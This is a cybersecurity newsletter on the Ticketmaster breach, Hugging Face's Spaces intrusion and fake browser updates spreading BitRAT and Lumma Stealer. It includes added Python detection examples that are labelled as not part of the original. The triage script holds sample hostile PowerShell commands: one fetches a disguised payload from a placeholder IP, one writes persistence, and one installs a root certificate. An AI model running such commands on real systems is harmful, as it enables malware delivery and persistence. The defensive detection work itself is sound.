Jun 03 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter that's blasting off like #Starlink
Today's hottest cybersecurity news stories:
Ticketmaster hacked again! 560m affected. $500k demanded
Hugging Face detects unauthorised access to Spaces platform
Beware of fake browser update delivering BitRAT, Lumma Stealer
Live Nation, Ticketmaster's owner, confirmed "unauthorised activity" on its database after hackers claimed to have stolen personal details of 560 million customers. The hacking group ShinyHunters is demanding a $500,000 ransom in exchange for not selling the data.
What Was Stolen?
The stolen data includes:
Names
Addresses
Phone numbers
Partial credit card details
Investigation Underway
Live Nation revealed in a filing to the SEC that a criminal threat actor offered the data for sale on the dark web on May 27. The exact number of affected customers remains unconfirmed.
Global Impact
The Australian government and the FBI are involved in addressing the breach. Live Nation is working to mitigate risks and notify users about the unauthorised access.
Linked Hacks
This breach may be connected to a larger hacking campaign. Santander recently confirmed a related data breach affecting 30 million customers. Data samples have been posted on BreachForums, a dark web hacking forum.
ShinyHunters' History
ShinyHunters has a notorious past, including a breach of 70 million AT&T customers in 2021 and 200,000 Pizza Hut customers in Australia last year. Despite the FBI's crackdown in March 2023, the group remains active.
Past Security Issues
Ticketmaster has faced security issues before, including a $10 million fine in 2020 for hacking a competitor and a cyber attack in November affecting Taylor Swift's Eras tour ticket sales.
Top Tips
If youβre worried you may be affected:
Be alert for suspicious emails, messages, and calls.
Avoid sharing information with scammers exploiting the breach.
Watch out for messages about password resets, compensation, or missed deliveries.
Monitor your financial accounts for suspicious activity.
Change your Ticketmaster password and any other sites using the same password.
Stay safe and vigilant as this situation unfolds!
Spending hours gathering evidence, tracking risk, and answering security questionnaires? Move away from manual work by automating key GRC program needs with Vanta.
Automate evidence collection across 21+ frameworks including SOC 2 and ISO 27001 with continuous monitoring
Centralize risk and report on program impact to internal teams
Create your own Trust Center to proactively manage buyer needs
Leverage AI to answer security questionnaires faster
Join Vanta's webinar on June 11 to learn more about scaling your GRC program with automation and AI.
AI company Hugging Face has revealed unauthorised access to its Spaces platform, and suspects that a subset of Spaces secrets may have been accessed without authorisation.
What is Spaces?
Spaces allows users to create, host, and share AI and machine learning applications. It also serves as a discovery service for AI apps made by others on the platform.
Immediate Response
Hugging Face is revoking compromised HF tokens and notifying affected users via email. It recommends refreshing keys or tokens and switching to fine-grained access tokens, which are now the default.
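The practical part of that advice is finding every token that was pasted into a Space rather than stored as a Space secret, revoking it, and replacing it with a fine-grained one read from the environment. The scanner below is an added example (not Hugging Face's code and not part of the original newsletter): it walks a constructed Space repository, reports token literals, and prints a rotation step per finding. The "hf_" prefix is the documented token shape; the 34-character body of the sample tokens, the file contents and the remediation wording are assumptions for the demo.

```python
import re
from typing import Dict, List, Tuple

# Hugging Face user access tokens carry the documented "hf_" prefix; the
# 34-character alphanumeric body used in the samples below is an assumption,
# so the pattern accepts any body of 30 or more characters.
HF_TOKEN_RE = re.compile(r"\bhf_[A-Za-z0-9]{30,}\b")

# Constructed contents of a hypothetical Space repository. The token strings
# are made up and only follow the shape of a real token.
SAMPLE_SPACE: Dict[str, str] = {
    "app.py": (
        "from huggingface_hub import HfApi\n"
        "# token pasted straight into source: anyone who reads the repo has it\n"
        "api = HfApi(token='hf_Cx7" + "k" * 31 + "')\n"
    ),
    ".env": "HF_TOKEN=hf_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh\n",
    "README.md": "Set HF_TOKEN as a Space secret; never commit tokens.\n",
    "good.py": "import os\ntoken = os.environ['HF_TOKEN']\n",
}


def mask(token: str) -> str:
    """Keep just enough of a token to identify it in a report."""
    return token[:6] + "..." + token[-4:]


def find_hardcoded_tokens(files: Dict[str, str]) -> List[Tuple[str, int, str]]:
    """Return (path, line_number, masked_token) for every token literal found."""
    hits: List[Tuple[str, int, str]] = []
    for path, text in files.items():
        for lineno, line in enumerate(text.splitlines(), start=1):
            for match in HF_TOKEN_RE.finditer(line):
                hits.append((path, lineno, mask(match.group(0))))
    return hits


def reads_token_from_env(files: Dict[str, str]) -> List[str]:
    """Paths already using the safe pattern: HF_TOKEN read from the environment."""
    return sorted(
        path for path, text in files.items()
        if re.search(r"os\.environ(\.get)?\s*[\[(]\s*['\"]HF_TOKEN['\"]", text)
    )


def rotation_plan(files: Dict[str, str]) -> List[str]:
    """One remediation line per finding; the actions are manual account steps."""
    plan = []
    for path, lineno, masked in find_hardcoded_tokens(files):
        plan.append(
            f"{path}:{lineno} exposes {masked}: revoke it, issue a fine-grained "
            "token limited to this Space's repos, store it as a Space secret and "
            "read it via os.environ['HF_TOKEN']"
        )
    return plan


if __name__ == "__main__":
    for step in rotation_plan(SAMPLE_SPACE):
        print(step)
    print("already env-based:", reads_token_from_env(SAMPLE_SPACE))
```

Run it against a checkout of each Space you own; anything the scanner reports was readable by whoever had access to the repository, so rotate it regardless of whether the platform's own notification email arrives.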
Impact and Investigation
The number of impacted users remains undisclosed. The incident is under investigation, and law enforcement and data protection authorities have been alerted.
AI Sector Under Attack
The rapid growth of AI has made AI-as-a-service providers like Hugging Face prime targets for attackers. In early April, cloud security firm Wiz highlighted potential vulnerabilities in Hugging Face, including cross-tenant access and AI/ML model poisoning risks.
Previous Security Concerns
Research by HiddenLayer identified flaws in Hugging Face's Safetensors conversion service that could let an attacker hijack AI models for supply chain attacks. Malicious actors compromising Hugging Face could access private AI models, datasets, and critical applications, posing significant risks.
Stay Secure
Hugging Face users should rotate their tokens and stay vigilant against potential security threats. This breach underscores the importance of robust security measures in the growing AI sector.
Cybersecurity firm eSentire has identified a new wave of cyberattacks using fake browser updates to distribute remote access trojans (RATs) and information-stealing malware such as BitRAT and Lumma Stealer (aka LummaC2).
The Attack Chain
Initial Contact: Victims are lured to a compromised website with JavaScript that redirects them to a fake browser update page ("chatgpt-app[.]cloud").
Download: The page prompts an automatic download of a ZIP archive file ("Update.zip") hosted on Discord.
Execution: Inside the ZIP file, a JavaScript file ("Update.js") executes PowerShell scripts to fetch additional payloads disguised as PNG images from a remote server.
PowerShell Payloads
The PowerShell scripts not only ensure persistence but also deploy a .NET-based loader used to deliver final-stage malware, including BitRAT and Lumma Stealer.
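Each stage of that chain leaves a process-creation event a defender can match on: a script host running a .js file out of a download directory, PowerShell spawned by that script host, PowerShell pulling a URL that ends in .png, and a persistence write. The triage logic below is an added example of how to correlate those stages per host; it is not eSentire's code and not part of the original report. The events are constructed in a simplified Sysmon process-creation shape, the hostnames, paths and the 198.51.100.7 address are hypothetical, and the persistence (Run key or scheduled task) and root-certificate signatures are assumed mechanisms, since the page names neither. The root-certificate rule covers the ClearFake lure mentioned in this item.

```python
import re
from typing import Dict, List, Set

# Constructed process-creation events (simplified Sysmon Event ID 1 fields).
# Hostnames, paths and 198.51.100.7 are hypothetical; only the stage order
# (script host -> PowerShell -> "image" download -> persistence) follows the report.
EVENTS: List[Dict[str, str]] = [
    {"host": "ws01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\alice\Downloads\Update\Update.js"'},
    {"host": "ws01", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
            ".DownloadFile('http://198.51.100.7/s/1.png', $env:TEMP + '\\1.png')\""},
    {"host": "ws01", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -c \"Set-ItemProperty HKCU:\\Software\\Microsoft\\Windows"
            "\\CurrentVersion\\Run -Name Update -Value $env:TEMP\\loader.exe\""},
    {"host": "ws02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -c \"certutil -addstore root $env:TEMP\\fix.cer\""},
    {"host": "ws03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -File C:\ProgramData\IT\inventory.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_FILE = re.compile(r"\.(js|jse|vbs|wsf)\b", re.I)
USER_WRITABLE = re.compile(r"\\(Downloads|Temp|AppData)\\", re.I)
DOWNLOAD_PRIMITIVE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Start-BitsTransfer",
    re.I)
IMAGE_URL = re.compile(r"https?://\S+?\.(png|jpe?g|gif)\b", re.I)
# Assumed persistence primitives: a Run-key write or a scheduled task.
PERSISTENCE = re.compile(r"CurrentVersion\\Run\b|schtasks(\.exe)?\s+/create", re.I)
# Assumed root-store install command shapes for the ClearFake-style lure.
ROOT_CERT = re.compile(
    r"certutil(\.exe)?\s+-addstore\s+root\b|Import-Certificate.*Cert:\\LocalMachine\\Root",
    re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: Dict[str, str]) -> List[str]:
    """Chain stages an event matches (empty list means nothing fired)."""
    img, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmd"]
    hits = []
    if img in SCRIPT_HOSTS and SCRIPT_FILE.search(cmd) and USER_WRITABLE.search(cmd):
        hits.append("script_from_user_dir")      # Update.js run out of Downloads
    if img in POWERSHELL and parent in SCRIPT_HOSTS:
        hits.append("ps_from_script_host")       # the .js handing off to PowerShell
    if img in POWERSHELL and DOWNLOAD_PRIMITIVE.search(cmd) and IMAGE_URL.search(cmd):
        hits.append("ps_fetches_fake_image")     # payload disguised as a PNG
    if img in POWERSHELL and PERSISTENCE.search(cmd):
        hits.append("ps_persistence")
    if ROOT_CERT.search(cmd):
        hits.append("root_cert_install")
    return hits


HIGH_FIDELITY = {"ps_fetches_fake_image", "root_cert_install"}


def triage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Per host, the sorted set of stages observed across all its events."""
    seen: Dict[str, Set[str]] = {}
    for ev in events:
        seen.setdefault(ev["host"], set()).update(classify(ev))
    return {host: sorted(stages) for host, stages in seen.items()}


def alerts(events: List[Dict[str, str]]) -> List[str]:
    """Hosts worth an analyst's time: two chain stages, or one high-fidelity stage."""
    return sorted(host for host, stages in triage(events).items()
                  if len(stages) >= 2 or HIGH_FIDELITY.intersection(stages))


if __name__ == "__main__":
    for host, stages in triage(EVENTS).items():
        print(host, stages)
    print("alert:", alerts(EVENTS))
```

The single-event rules are deliberately loose (an IT script that downloads a real PNG would trip one of them); the value is in requiring two stages on the same host, which is what the fake-update chain cannot avoid producing, while the root-store install stands alone because there is almost no benign reason for a user-launched PowerShell to add a root certificate.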
BitRAT: A versatile RAT capable of data theft, cryptocurrency mining, and remote control.
Lumma Stealer: A commercial information stealer that extracts data from web browsers, crypto wallets, and more, available for $250 to $1,000 per month since August 2022.
Why This Tactic Works
The fake browser update lure is effective because it borrows the trust users place in well-known software updates, maximising the reach and impact of the attack. This method has been commonly used to distribute various types of malware, including the notorious SocGholish malware.
Broader Threat Landscape
ClearFake Campaign: A new variant discovered by ReliaQuest involves tricking users into executing malicious PowerShell code by claiming a browser display issue and instructing them to install a root certificate.
Webhard Distribution: The AhnLab Security Intelligence Center (ASEC) reported campaigns using webhards to distribute malicious installers for adult games and cracked software, leading to malware like Orcus RAT and XMRig miner.
Impact and Prevalence
Lumma Stealer has become one of the most prevalent info stealers, with a significant increase in logs for sale on cybercrime forums. The malwareβs effectiveness lies in its ability to infiltrate systems and exfiltrate data undetected.
Additional Findings
CryptoChameleon: Silent Push highlighted CryptoChameleon's use of DNSPod[.]com nameservers for fast flux evasion, quickly cycling the IP addresses linked to a single domain name, which complicates traditional IP-based countermeasures.
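Fast flux shows up in passive DNS as one name resolving to many unrelated addresses with TTLs short enough to rotate them within minutes, which is what makes IP blocklists lag behind. The profiler below is an added example of that hunt, not Silent Push's tooling and not part of the original report; the records, names, addresses (documentation and shared-address ranges) and thresholds are all constructed for the demo. It counts distinct addresses and distinct /16 prefixes per name, so a CDN that spreads one site across a contiguous block is not flagged the way a flux network spanning unrelated space is.

```python
import ipaddress
from collections import defaultdict
from statistics import median
from typing import Dict, List, Tuple

# Constructed passive-DNS observations: (epoch_seconds, name, A_record, ttl).
# Names and addresses are hypothetical; none come from the Silent Push research.
RECORDS: List[Tuple[int, str, str, int]] = [
    # a lure domain cycling through unrelated address space every five minutes
    (1717400000, "wallet-verify.example", "203.0.113.10", 60),
    (1717400300, "wallet-verify.example", "198.51.100.25", 60),
    (1717400600, "wallet-verify.example", "192.0.2.77", 60),
    (1717400900, "wallet-verify.example", "100.64.3.9", 60),
    (1717401200, "wallet-verify.example", "100.65.11.2", 60),
    (1717401500, "wallet-verify.example", "100.66.200.4", 60),
    (1717401800, "wallet-verify.example", "203.0.113.99", 60),
    (1717402100, "wallet-verify.example", "100.67.5.5", 60),
    # a CDN-fronted site: many addresses and short TTLs, but one contiguous block
    (1717400000, "cdn.example", "192.0.2.1", 30),
    (1717400600, "cdn.example", "192.0.2.2", 30),
    (1717401200, "cdn.example", "192.0.2.3", 30),
    (1717401800, "cdn.example", "192.0.2.4", 30),
    (1717402400, "cdn.example", "192.0.2.5", 30),
    (1717403000, "cdn.example", "192.0.2.6", 30),
    # an ordinary site: one address, long TTL
    (1717400000, "www.example", "203.0.113.200", 3600),
    (1717403600, "www.example", "203.0.113.200", 3600),
]


def profile(records, window_s: int = 6 * 3600) -> Dict[str, Dict[str, float]]:
    """Summarise each name over the window ending at its newest observation."""
    by_name = defaultdict(list)
    for ts, name, ip, ttl in records:
        by_name[name].append((ts, ip, ttl))
    out = {}
    for name, rows in by_name.items():
        rows.sort()
        newest = rows[-1][0]
        recent = [r for r in rows if newest - r[0] <= window_s]
        ips = {ip for _, ip, _ in recent}
        # /16 diversity is a crude stand-in for ASN diversity (no ASN feed offline)
        prefixes = {str(ipaddress.ip_network(f"{ip}/16", strict=False)) for ip in ips}
        flips = sum(1 for a, b in zip(recent, recent[1:]) if a[1] != b[1])
        out[name] = {
            "distinct_ips": len(ips),
            "distinct_slash16": len(prefixes),
            "median_ttl": median([ttl for _, _, ttl in recent]),
            "ip_flips": flips,
        }
    return out


def is_fast_flux(p: Dict[str, float], min_ips: int = 5,
                 min_prefixes: int = 3, max_ttl: int = 300) -> bool:
    """Thresholds are assumptions for the demo: many addresses, spread over
    unrelated /16s, with TTLs short enough to rotate them within minutes."""
    return (p["distinct_ips"] >= min_ips
            and p["distinct_slash16"] >= min_prefixes
            and p["median_ttl"] <= max_ttl)


def suspects(records) -> List[str]:
    """Names whose resolution history looks like fast flux."""
    return sorted(name for name, p in profile(records).items() if is_fast_flux(p))


if __name__ == "__main__":
    for name, p in profile(RECORDS).items():
        print(name, p)
    print("fast-flux suspects:", suspects(RECORDS))
```

In production the /16 heuristic should be replaced by ASN lookups from an IP-to-ASN feed, and the name's nameserver history (the DNSPod[.]com detail above) added as a second pivot, since flux operators tend to reuse the same DNS provider across many lure domains.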
Top Tips
Be Wary of Fake Updates: Always verify the source of any software update prompt.
Monitor PowerShell Activity: Keep an eye on unexpected PowerShell executions.
Use Security Software: Employ robust antivirus and anti-malware tools.
Stay Informed: Keep up with cybersecurity news and updates to be aware of emerging threats.
By staying vigilant and informed, individuals and organisations can better protect themselves against these sophisticated and evolving cyber threats.
Extra, Extra! Read all about it!
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday
Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for
Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future
Let us know what you think.
So long and thanks for reading all the phish!